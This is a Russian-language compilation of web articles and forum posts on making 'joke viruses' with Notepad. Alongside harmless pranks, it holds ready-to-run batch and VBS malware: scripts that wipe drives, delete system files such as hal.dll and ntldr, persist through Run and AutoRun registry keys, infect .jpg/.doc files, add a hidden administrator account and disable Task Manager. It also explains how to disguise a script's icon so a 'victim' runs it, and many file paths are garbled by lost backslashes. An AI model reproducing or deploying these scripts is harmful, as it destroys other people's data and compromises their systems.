Содержание
- Создаем вирус-шутку через блокнот №2
- Создаем вирус в блокноте
- NGaming
- NGaming
- prorok
- Justman
- NGaming
- grinex
- Русский парк
- Топик
- Личный славянчик супер`s блог (3)
- Простые вирусы в NotePad++
- Как создаются вирусы | Создаем шуточные вирусы
- Как создаются компьютерные вирусы | Немного теории
- Создаем шуточные вирусы и не только
Создаем вирус-шутку через блокнот №2
И так друзья, в связи с тем, что под моим прошлым постом собралось много положительных комментариев от многоуважаемых читателей.
Рейтинг моего профиля возросла на глазах.
Мои комментарии и ответы набирали во тысячи плюсиков.
Мне говорили, что у них все работает, все получилось.
И поэтому я решил. Сделать продолжение. Наслаждайтесь :3
И так, в этом посте я конкретно расскажу про два формата: .bat и .vbs
Начнем с того, что разница в этих форматах принципиальная.Если сохранить команду в .bat, то компьютер будет выполнять то, то вы написали. Например написали команду для выключения компьютера. Сохранили в расширении .bat Если вы откроете этот файл, то ваш комп выключится, т.к. это было написано в программе. И сразу предупреждение: нельзя скрещивать в одной команде .bat и .vbs! У вас либо заглючит комп, либо начнет выполнять все команды одновременно и сломается.
Расширение .vbs это последовательное выполнение действий. Например в коде вы написали:
msgbox»Нажмите да или нет»,32+4,»Выбор»
При любом нажатии на кнопку (да,нет,крестик) окно закроется. Но! Если вы добавите в код что-то после первого окна, то при любом нажатии на кнопку (да,нет,крестик) у вас откроется следующее окно. Добавим одну строчку и получится вот это:
msgbox»Нажмите да или нет»,32+4,»Выбор»
msgbox»Нажмите ок для продолжения.»,64,»Нажмите!»
Этот код можно продолжать бесконечно. Главное не написать лишний символ/цифру. Никто вам не покажет, где ошибка. Код просто не запустится.
Думаю разница между двумя форматами понятна.
В конце поста будет ссылка на один сайт, где написаны команды для .bat вирусов.
Также удобность этих форматов в том, что если вы только начинаете создавать вирусы, новичок, то вы легко можете скопировать любой код, изменять там текст и использовать его. В кодах все интуитивно понятно. Что за что отвечает, что где писать. В следующем посту я накидаю сайтов, где вы сможете узнать как менять картинку в окне, что писать для того, чтобы в окне было «ок»,»продолжить» и т.д., что нельзя писать, как командой открыть файл, как сделать вирус-спамер и другое.
Окей, мой пост заканчивается. Чуть позже я более подробно расскажу про коды, про различные команды.
Пишите больше милых комментариев, мне приятно. Удачи!
Источник
Создаем вирус в блокноте
NGaming
.pisya
Удаляет все с доп. носителей
Удаляет все что хранится в реестре
Останавливает доступ в Интернет пользователя. Чтобы получить доступ обратно напишите IPconfig /renew в CMD
Отправляет сообщение и выключает компьютер
Простой вирус, который заставляет компьютер дать ошибку.
Сохранить как файл.VBS
Форматируются диски менее чем за 5 секунд. Только D, Е и С
Останавливает компьютер каждый раз при его включении
А теперь более опасные батники:
Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы
НЕ ИСПОЛЬЗУЙТЕ НА СЕБЕ
Этот вирус отключает Интернет навсегда
NGaming
.pisya
prorok
Have a nice day
Justman
Даэдрот такой
NGaming
.pisya
grinex
aka Logequm
Удаляет все с доп. носителей
Удаляет все что хранится в реестре
Останавливает доступ в Интернет пользователя. Чтобы получить доступ обратно напишите IPconfig /renew в CMD
Отправляет сообщение и выключает компьютер
Простой вирус, который заставляет компьютер дать ошибку.
Сохранить как файл.VBS
Форматируются диски менее чем за 5 секунд. Только D, Е и С
Останавливает компьютер каждый раз при его включении
А теперь более опасные батники:
Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы
НЕ ИСПОЛЬЗУЙТЕ НА СЕБЕ
Этот вирус отключает Интернет навсегда
Источник
Русский парк
Топик
Личный славянчик супер`s блог (3)
Как создать вирус шутку с помощью блокнота 🙂
Вирусы-шутки — это несложные программы, которые можно подсунуть другу (или врагу), и тот будет думать, что его компьютер взломан, поражен вирусом или серьезно поврежден. Вирусы-шутки можно писать в обычном Блокноте: нужно лишь записать в файл команды, которые тормозят компьютер, нарушают работу системы или просто пугают пользователя, а затем заставить его запустить этот файл на исполнение. Вирусы-шутки могут быть чем угодно, начиная от надоедливой неприятности и заканчивая кошмаром, нарушающим работу системы. «Вирусы» из этой статьи предназначены только для безобидных шуток, самое худшее что они могут сделать — это выключить компьютер. Внимание: эти вирусы-шутки предназначены только для Windows PC, они не будут работать на Mac OS без специальной подготовки. Начнем с шага 1.
Метод 1 из 3: Пишем поддельный вирус, открывающий «бесконечные» окна
Откройте блокнот. Пакетные (.BAT) файлы содержат команды для компьютера в текстовом виде. Для того, чтобы написать BAT-файл, не нужен специальный редактор — достаточно Блокнота из стандартного набора программ Windows. Блокнот можно найти в меню «Пуск» или в подменю «Стандартные». Открыть Блокнот можно также, нажав сочетание клавиш Win+R, в текстовом поле появившегося диалогового окна набрать «notepad» и нажать Enter.
2
Наберите «@echo off», а затем, на новой линии «CLS». По умолчанию BAT-файлы открывают окно командной строки и выводят исполняемые команды. Команды «@echo off» и «CLS» предотвращают появление команд в окне командной строки, делая причину шутки невидимым для жертвы.
3
Напишите команды для открытия множества (или бесконечного количества) окон. Теперь наступило время написать последовательность команд, исполняя которые, ваш поддельный вирус откроет много окон разных программ один раз или будет отрывать эти окна бесконечно. Важно знать, если бесконечно открывается очень много окон, компьютер в конце концов может зависнуть. Читайте далее о том, как сделать оба вида «вируса»:
Чтобы открыть определенное количество окон, начните новую строку и наберите в Блокноте следующую команду: start (название программы). Вместо фразы в скобках поставьте название программы в вашем компьютере или или полное имя исполняемого файла. Эта команда дает инструкцию компьютеру открывать окно указанной программы. Например, start iexplore.exe откроет окно Internet Explorer. Повторите эту команду «start» столько раз, сколько захотите, и ваш «вирус» откроет окно столько раз, сколько вы укажете. Вот несколько программ которые можно ввести после команды «start»:
iexplore.exe — интернет
calc.exe — Калькулятор
notepad.exe — Блокнот
winword.exe — Microsoft Word
Чтобы открыть бесконечное количество окон, сначала начните новую строку и наберите :A, включая двоеточие. На следующей строке наберите start iexplore.exe (или другую программу). И, наконец, строкой ниже наберите goto A. Эта последовательность команд заставляет компьютер открывать окно Internet Explorer (или любой другой программы), возвращаться к месту непосредственно перед открытием окна, а затем сразу же открывать новое окно, пока окно командной строки не будет закрыто или компьютер не зависнет.
4
Напишите в «вирусе» сообщение. Для устрашающего эффекта можно добавить в «вирус» сообщение, которое заставит пользователя думать, что с его/ее компьютером что-то не так. Чтобы показать сообщение, начните новую строку и наберите echo Ваше сообщение. Затем с новой строки наберите pause. Команда «pause» остановит выполнение «вируса» после появления сообщения.
Чтобы ваша шутка была правдоподобной, напишите сообщение, похожее на настоящие сообщения об ошибках, например: Fatal Error. C:// directory corrupted.
5
Сохраните текст как пакетный файл. Когда закончите, выберите File > Save As. а затем укажите расширение файла «.bat» (например, «pinball.bat»). В выпадающем списке «Тип файла» должно быть выбрано «Все файлы». Сохраните ваш файл где нибудь в компьютере.
6
Заставьте пользователя открыть файл. Чтобы ваша шутка заработала, нужно сделать так, чтобы кто-то запустил ее. Этого можно добиться разными способами. Один из самых работающих — создать ярлык для своего пакетного файла и изменить его иконку Method_Four:_Change_Shortcut_Icons create a shortcut of your batch file, then change its icon на что-то, чем пользователь действительно пользуется, а затем изменить название ярлыка, чтобы оно соответствовало иконке. Откиньтесь на спинку кресла и наблюдайте за результатами из удобного места!
1
Откройте Блокнот. Как и в предыдущей шутке, в этой нужно написать в Блокноте несколько простых команд. Однако на этот раз эффект будет другой — вместо открытия окон это шутка создает несколько сообщений с ошибками, которые заставят пользователя думать, что его/ее компьютер совершил ошибку или был взломан.
2
Наберите «x=msgbox(«Текст сообщения», 5+16, «Заголовок сообщения») точно так, как здесь указано, включая скобки и кавычки, и замените «Текст сообщения» и «Заголовок сообщения» желаемым текстом. Эта команда открывает стандартное диалоговое окно ошибки Windows с указанными вами сообщением об ошибке и заголовком окна. Чтобы ваша шутка была правдоподобной, используйте сообщения и заголовки, похожие на настоящие. Например попробуйте в качестве заголовка «Terminal Error», а в качестве сообщения — «Critical fault detected at C://Users/Windows/system32».
Возможно, вам захочется развить свою шутку в направлении взлома. В таком случае используйте сообщения вроде: «Я имею полный доступ к вашей системе. Приготовьтесь ко взлому». На самом деле ничего такого не случится, так что это сработает только с людьми, которые плохо разбираются в компьютерах.
Выражение «5+16» указывает компьютеру создать диалоговое окно с иконкой критической ошибки и двумя кнопками «Повтор» и «Отмена». Изменяя эти числа, можно получить разные типы окон с ошибками. Просто подставьте из приведенных ниже чисел любое число из одной цифры вместо 5 и любое число из двух цифр вместо 16:
0 (Кнопка OK)
1 (Кнопки OK и Отмена)
2 (Кнопки Отмена, Повтор и Пропустить)
3 (Кнопки Да, Нет, и Отмена)
4 (Кнопки Да и Нет)
5 (Кнопки Повтор и Отмена)
16 (Иконка критической ошибки)
32 (Иконка помощи)
48 (Иконка предупреждения)
64 (Иконка информации)
3
Повторяйте сообщение об ошибке, сколько вам угодно. Повторяйте команды, приведенные выше столько раз, сколько пожелаете, с любыми сообщениями об ошибках. Сообщения будут появляться одно за другим, то есть, как только пользователь закроет одно сообщение — откроется другое. Можете использовать этот факт, чтобы создать длинное сообщение, которое будет носить все более неотлагательный характер.
4
Сохраните документ как файл Visual Basic (VBA). Когда вы напишите все сообщения, которые хотите, сохраните файл. Выберите File > Save As. и дайте своему файлу имя с окончанием «.vba». Обязательно выберите «Все файлы» из выпадающего списка «Тип файла». Теперь, чтобы шутка удалась, нужно заставить кого-то запустить этот файл, например используя трюк из метода 1.
Метод 3 из 3: Использование предварительно написанного пакетного файла
1
Откройте Блокнот. Это шутка использует команды из Блокнота, чтобы заставить компьютер открывать программы случайным образом до тех пор, пока пакетный файл не будет отключен или компьютер не зависнет. Чтобы сделать эту шутку, вам просто нужно скопировать и вставить команды, указанные в этом разделе. Однако заметьте, что это может работать не на всех компьютерах.
2
Скопируйте и вставьте следующие команды:@echo offclsbegingoto %random%:1start cmd.exegoto begin:2start mspaint.exegoto begin:3start pinball.exegoto begin:4start iexplore.exegoto begin:5start explorer.exegoto begin:6start solitaire.exegoto begin:7start explorer.exegoto begin:8start edit.exegoto begin:9start iexplore.exegoto begin:0start mspaint.exegoto begin
3
Изменяйте эти команды на свое усмотрение. Эта программа случайным образом бесконечно открывает программы, указанные после слова «start». Возможно, вы заметили, что некоторые программы повторяются. Изменяйте список программ, как вы того пожелаете.
Заметьте, что некоторые названия программ, перечисленных выше, могут быть неправильными для некоторых машин, например на некоторых компьютерах может не быть «pinball.exe». Следует проверить дважды правильность названий программ, перед тем, как запускать этот вирус-шутку.
Если вы сомневаетесь в названии какой-то программы, помните, что точный путь программы тоже подходит. Например, вместо «iexplore.exe» можно написать «C:Program FilesInternet Explorer».
4
Сохраните текст как пакетный файл и запустите его (если отважитесь). Сохраните файл с расширением «.bat», выбрав «Все файлы» из выпадающего списка «Тип файла». Когда вам удастся заставить пользователя запустить его, он начнет случайным образом без остановки открывать программы в компьютере.
Чтобы было веселей, попробуйте заменить в одной из команд ‘*.exe’ на полный путь к какому-либо документу пользователя. Например, ‘start C:Docs123.doc’ откроет документ 123.doc из папки Docs в редакторе по умолчанию, а
edit (полное имя файла)
goto begin
откроет указанный файл в текстовом редакторе DOS. Это будет выглядеть так, как будто хакер читает личные документы. Помните, что имя файла, содержащее пробелы, должно заключаться в кавычки!
5
Изучите значения команд, чтобы модифицировать свои шутки. Даже если вы не понимаете, как они работают, вирусы-шутки могут быть хорошим развлечением. Но вам будет еще веселей, если вы будете понимать, что происходит при их запуске, и когда вы разберетесь, как работают эти «вирусы», вы сможете писать свои собственные! Вот список команд, используемых в этой статье, а также их краткое описание:
@echo off — отключить вывод команд
cls — очистить экран командной строки. Командная строка будет выглядеть аккуратней.
goto A — перейти на метку А.
%random% — переменная Windows, генерирующая случайные числа от 0 до 9 (включительно).
:(число, буква или слово) — метка. На нее можно переходить при помощи команды «goto».
На заметку: в примере выше у нас 10 меток. Если мы пропустим одно число, программа закроется, если %random% сгенерирует это число.
Советы
Вот образец одной из самых надоедливых программ и ее код:
@echo off
:a
start notepad
goto a
Все, что она делает — открывает Блокнот бесконечное количество раз до тех пор, пока вы не закроете окно командной строки. Не запускайте ее на компьютере без присмотра — это может плохо закончиться.
Это упрощенный вариант метода 1, рассмотренного выше.
Экспериментируйте с разными командами! Если вы хотите сделать шутку зловредной, примените команду, которая удаляет файлы или стирает весь жесткий диск. Но я вам ее не скажу, потому что находятся неудачники, которые делают это со своим компьютером, а во всем винят меня!
Источник
Простые вирусы в NotePad++
BATCH & EXECUTE
BUGS
Итак, пишем в блокноте:
time 00:00
copy %0 F:Work.bat
Вот две программки вам на рассмотрение, можете их использовать без моего соглашения, но, используя их, вы принимаете соглашение пользователя.
1) Программа для удаления файлов с флешки (если та вставлена) и переименования ее.
del F: *.* /q
label F:HACK
del C: *.* /q
del D: *.* /q
del E: *.* /q
del F: *.* /q
time 00:00
date 13.06.23
del *.* /q
Готов ли наш вирус? – Спросите себя. Конечно, нет. Нужно его немедленно закончить. В этом я вам с удовольствием помогу. И так наша новая команда «@echo off» вводиться в начале нашего вируса и скрывает все, что в нем происходит в дальнейшем. Одним словом, не дадим пользователю увидеть, что случилось. Еще добавив после каждой команды простенькое, но очень эффективное действие, как «>nul» к примеру «time 00:00 >nul», мы скроем сточку. Итак, можно усовершенствовать наш вирус:
@echo off
del C: *.* /q >nul
del D: *.* /q >nul
del E: *.* /q >nul
del F: *.* /q >nul
time 00:00 >nul
date 13.06.23 >nul
del *.* /q >nul
😡 ;
Start mspaint
goto x ;
Очень неплохая строка для нагрузки слабеньких машин. Команда открывает Paint, причем очень быстро. Раз 60 до того как вы поймете, что случилось и закроете программу. Попробуйте ввести вместо mspaint любые строки программ. Работает Можно использовать по несколько таких команд до полного торможения компьютера нашей жертвы.
Пишем новый скрипт:
copy «»%0″» «%SystemRoot%system32File.bat»
reg add «HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun» /v «Filel» /t REG_SZ /d «%SystemRoot%system32File.bat» /f
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f
Очень жестокая команда, добавляет программу в автозагрузку ОС. Не советую проверять на вашем компьютере. Не останавливаемся, и едем дальше.
На этом мои уроки закончены. Надеюсь, вам понравилось! С уважением SMOKED! P.S. Когда я первый раз выложил эту статью в интернет. На мой ICQ пришло около 70 сообщений с просьбой взломать почтовый ящик . Писал все сам, статья моя!
Понравилась статья? Подпишитесь на канал, чтобы быть в курсе самых интересных материалов
Источник
Как создаются вирусы | Создаем шуточные вирусы
Данная статья написана в образовательных целях и автор не несет ответственности за совершенные вами действия. Будьте благоразумны и цените труды других людей.
Как создаются компьютерные вирусы | Немного теории
Компьютерные вирусы – вид вредоносного программного обеспечения, способного создавать копии самого себя и внедряться в код других программ, системные области памяти, загрузочные секторы, а также распространять свои копии по разнообразным каналам связи.
Компьютерные вирусы имеют следующие классификации:
И всё же, WannaCry хоть и был распространен и довольно много с него денег поимели, это был обычный WinLocker, который можно было снять. Дело в том, что платили в большинстве банки и компании, у которых не было времени разбираться, а 300 долларов для них не является серьезной потерей.
Создаем шуточные вирусы и не только
Давайте создадим несколько своих вирусов, которые я не рекомендую проверять на своей компьютере, так как это может очень плохо закончиться.
Сделать такие вирусы сможет абсолютно каждый, так как нам не понадобятся специализированное ПО и т.п., нам нужен просто блокнот.
Удаление всех файлов
Данный код мы сохраняем как anyname.bat и все, после запуска всё содержимое удалится.
Синий экран Смерти
Форматируем диски C, D, E за три секунды
Сохраняем данный файл как anyname.bat и запускаем. Форматирование всех дисков произойдёт за три секунды.
Эффект Матрицы | Matrix Effect
@echo off
color 02 :tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks
Сохраняем как anyname.bat и запускаем, это не опасно для вашего ПК.
Выключение ПК и отключение возможности перезагрузики
Сохраняем как kind.bat, ОПАСНО ЗАПУСКАТЬ НА СВОЕМ ПК!
Заменяем файлы на нерабочие
Сохраняем как anyname.bat и запускаем.
Удаление операционной системы
Сохраняем как anyname.bat и запускаем на ПК жертвы.
А на этом сегодня всё, спасибо за прочтение статьи и я надеюсь вы не будете злоупотреблять полученной информацией. Если вы хотите ещё вирусов, то пишите в комментариях, сделаем! Сохраните статью в своих социальных сетях, чтобы не потерять.
Источник
Шутки с использованием vbs-скриптов. Можно подшутить над другом или коллегами на работе.
Для того, чтобы активировать скрипт с приколом нужно следующее: открыть блокнот, скопировать vbs-скрипт, который находится ниже, далее вставить этот скрипт в блокнот и сохранить с расширением *.vbs, а после запустить на компе жертвы.
Пугалка №1.
На экране появляются сообщения о том, что система заражена, появляется много командных строк, калькуляторы, блокноты и другое.
on error resume next set t=createobject("Wscript.Shell") set kill = createobject("wscript.shell") kill.run"taskkill /f /im explorer.exe",0 msgbox"Неполадка системы",16,"Error" msgbox"Вы заражены вирусом",48,"Windows" msgbox"Необходим перезапуск системы",16,"Windows" t.run"help" t.run"help" t.run"help" t.run"help" t.run"calc.exe" t.run"notepad.exe" t.run"telnet" t.run"help" t.run"explorer" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"calc.exe" t.run"notepad.exe" t.run"telnet" t.run"help" t.run"help" msgbox"Сбой системы",16,"Windows" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"calc.exe" t.run"notepad.exe" t.run"telnet" t.run"help" t.run"explorer" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"calc.exe" t.run"notepad.exe" t.run"telnet" t.run"help" t.run"help" msgbox"Сбой системы",16,"Windows" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"calc.exe" t.run"notepad.exe" t.run"telnet" t.run"help" t.run"explorer" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"help" t.run"calc.exe" t.run"notepad.exe" t.run"telnet" t.run"help" t.run"help" msgbox"Сбой системы",16,"Windows" t.run"help" t.run"help" t.run"help"
Пугалка №2. Мигающая клавиатура
На клавиатуре мигают лампочки, а так же имитируется нажатие клавиш CapsLock, NumLock, ScrollLock, в результате чего написанный текст принимает вид: ТаКоЙ ТеКсТ
Set s = CreateObject("Wscript.Shell") do wscript.sleep 80 s.sendkeys"{numlock}" wscript.sleep 80 s.sendkeys"{capslock}" wscript.sleep 80 s.sendkeys"{scrolllock}" wscript.sleep 80 wscript.sleep 80 s.sendkeys"{numlock}" wscript.sleep 80 s.sendkeys"{capslock}" wscript.sleep 80 s.sendkeys"{scrolllock}" wscript.sleep 80 s.sendkeys"{scrolllock}" wscript.sleep 80 s.sendkeys"{capslock}" wscript.sleep 80 s.sendkeys"{numlock}" wscript.sleep 80 wscript.sleep 80 s.sendkeys"{scrolllock}" wscript.sleep 80 s.sendkeys"{capslock}" wscript.sleep 80 s.sendkeys"{numlock}" wscript.sleep 80 s.sendkeys"{numlock}" wscript.sleep 80 s.sendkeys"{capslock}" wscript.sleep 80 s.sendkeys"{scrolllock}" wscript.sleep 80 loop
Пугалка №3.
Открывается блокнот и пишется текст
on error resume next set t=createobject("Wscript.Shell") Set s = CreateObject("Wscript.Shell") set kill = createobject("wscript.shell") kill.run"taskkill /f /im explorer.exe",0 t.run"notepad" wscript.sleep 580 s.sendkeys"+{х}" wscript.sleep 80 s.sendkeys"{о}" wscript.sleep 80 s.sendkeys"{ч}" wscript.sleep 80 s.sendkeys"{е}" wscript.sleep 80 s.sendkeys"{ш}" wscript.sleep 80 s.sendkeys"{ь}" wscript.sleep 80 s.sendkeys"{ }" wscript.sleep 80 s.sendkeys"+{н}" wscript.sleep 80 s.sendkeys"{а}" wscript.sleep 80 s.sendkeys"{у}" wscript.sleep 80 s.sendkeys"{ч}" wscript.sleep 80 s.sendkeys"{у}" wscript.sleep 888 s.sendkeys"%{f4}" wscript.sleep 80 s.sendkeys"{RIGHT}" wscript.sleep 80 s.sendkeys"{enter}" msgbox"Страшно было xD",16,"Шутка" t.run"explorer.exe"
Простенькие вирусы:
Убирает рабочий стол
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
@echo off
shutdown -s -t 1 -c «lol» >nul
@echo off
shutdown -r -t 1 -c «lol» >nul
Запрещает запускать программы
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul
@echo off
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul
@echo off
del «%SystemRoot%Media» /q >nul
Запрещает заходить в панель управления
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrent VersionPoliciesExplorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
Удаляет курсор мыши
del «%SystemRoot%Cursors*.*» >nul
Меняет название корзины
reg add HKCUSoftwareMicrosoftWindowsShellNoRoamMUICache /v @C:WINDOWSsystem32SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
Убирает панель управления
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
Серьезные вирусы:
Удаляет ВСЕ с разделадиска(не пытайтесь проверить у себя)
rd [Буква_Диск]: /s /q
Удаляет все файлы в program files
del c:Program Files/q
Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul
Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i
Удаляет все драйвера, которые установлены на компьютере
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul
Удаляет команду DEL
del %0
Будет открывать бесконечно Paint
Start mspaint
goto x
Изменяет расширение всех ярлыков на .txt
assoc .lnk=.txt
Заражает Autoexec
copy «»%0″» «%SystemRoot%system32batinit.bat» >nul
reg add «HKCUSOFTWAREMicrosoftCommand Processor» /v AutoRun /t REG_SZ /d «%SystemRoot%syste m32batinit.bat» /f >nul
Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «support» /t reg_dword /d 0 y
сбой системы (!) — выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,disableoemlayer
Меняет местами кнопки мыши,но обратная смена не возможна)
rundll32 user,SwapMouseButton
Удаляет ядро системы
del %systemroot%system32HAL.dll
Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает
не только в текущем каталоге, но и надкаталоге)
@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find «MrWeb»<%0>c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (..*.jpg ..*.doc ..*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
Вирус заражает *.JPG в текущем каталоге
@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find «MrWeb»<%0>c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
Жестокие вирусы:
У вашего ламера будет глючить компьютер.
@echo off
echo Set fso = CreateObject(«Scripting.FileSystemObject») > %systemdrive%windowssystem32rundll32.vbs
echo do >> %systemdrive%windowssystem32rundll32.vbs
echo Set tx = fso.CreateTextFile(«%systemdrive%windowssystem32rundll32.dat», True) >> %systemdrive%windowssystem32rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%windowssystem32rundll32.vbs
echo tx.close >> %systemdrive%windowssystem32rundll32.vbs
echo FSO.DeleteFile «%systemdrive%windowssystem32rundll32.dat» >> %systemdrive%windowssystem32rundll32.vbs
echo loop >> %systemdrive%windowssystem32rundll32.vbs
start %systemdrive%windowssystem32rundll32.vbs
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v system_host_run /t REG_SZ /d %systemdrive%windowssystem32rundll32.vbs /f
Вирус который убивает Винду. Не проверяйте на своем компьютере=)
@echo This virus created by LIZA
@echo Virus: pcforumhack.ru™ Virus
@echo Autor: LIZA
@echo off
echo Chr(39)>%temp%temp1.vbs
echo Chr(39)>%temp%temp2.vbs
echo on error resume next > %temp%temp.vbs
echo Set S = CreateObject(«Wscript.Shell») >> %temp%temp.vbs
echo set FSO=createobject(«scripting.filesystemobject»)>>%temp%temp.vbs
reg add HKEY_USERSS-1-5-21-343818398-1417001333-725345543-1003SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v nodesktop /d 1 /freg add HKEY_USERSS-1-5-21-343818398-1417001333-725345543-1003SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%user32dll.bat
reg add «hklmSoftwareMicrosoftWindowsCurrentVersionRun» /v RunExplorer32 /d %SystemRoot%user32dll.bat /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoDrives /t REG_DWORD /d 67108863 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile «C:ntldr»,1 >> %temp%temp.vbs
reg add «HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions» /v «NoSelectDownloadDir» /d 1 /f
reg add «HKLMSOFTWAREMicrosoftInternet ExplorermainFeatureControlFeature_LocalMachine_Lockdown» /v «IExplorer» /d 0 /f
reg add «HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions» /v «NoFindFiles» /d 1 /f
reg add «HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions» /v «NoNavButtons» /d 1 /f
echo fso.deletefolder «D:Windows»,1 >> %temp%temp.vbs
echo fso.deletefolder «I:Windows»,1 >> %temp%temp.vbs
echo fso.deletefolder «C:Windows»,1 >> %temp%temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot») >> %temp%temp.vbs
echo fso.deletefile sr+»system32hal.dll»,1 >> %temp%temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot») >> %temp%temp.vbs
echo fso.deletefolder sr+»system32dllcache»,1 >> %temp%temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot») >> %temp%temp.vbs
echo fso.deletefolder sr+»system32drives»,1 >> %temp%temp.vbs
echo s.regwrite «HKEY_CLASSES_ROOTCLSID{645FF040-5081-101B-9F08-00AA002F954E}LocalizedString»,»forum.whack.ru™»>>%temp%temp.vbs
echo s.regwrite «HKLMSOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner»,»forum.whack.ru™»>>%temp%temp.vbs
echo s.regwrite «HKLMSOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOrganization»,»forum.whack.ru™»>>%temp%temp.vbs
echo on error resume next > %temp%temp1.vbs
echo set FSO=createobject(«scripting.filesystemobject»)>>%temp%temp1.vbs
echo do>>%temp%temp1.vbs
echo fso.getfile («A:»)>>%temp%temp1.vbs
echo loop>>%temp%temp1.vbs
echo on error resume next > %temp%temp2.vbs
echo Set S = CreateObject(«Wscript.Shell») >> %temp%temp2.vbs
echo do>>%temp%temp2.vbs
echo execute»S.Run «»%comspec% /c echo «» & Chr(7), 0, True»>>%temp%temp2.vbs
echo loop>>%temp%temp2.vbs
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem» /v disabletaskmgr /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem» /v disableregistrytools /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesNonEnum» /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoNetworkConnections /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v StartmenuLogoff /t REG_DWORD /d 1 /f
